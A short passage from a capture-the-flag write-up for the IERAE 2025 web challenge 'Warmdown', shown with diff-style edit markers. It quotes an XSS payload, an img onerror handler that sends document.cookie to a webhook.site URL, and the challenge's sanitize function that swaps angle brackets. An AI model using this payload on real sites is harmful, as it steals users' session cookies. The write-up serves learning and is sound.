oiu890/CTF-Writeups/IERAE 2025/web/Warmdown/Warmdown.md

 <img src = "x" onerror = "fetch('https://webhook.site/?c=' + encodeURIComponent(document.cookie))">
 ```
 We will pass the payload to the bot by putting it in the markdown parameter.

-But wait, take a look at the web pages backend.
+BUT WAIT, take a look at the web pages backend:
 ```js
 const sanitize = (unsafe) => unsafe.replaceAll("<", "＜").replaceAll(">", "＞");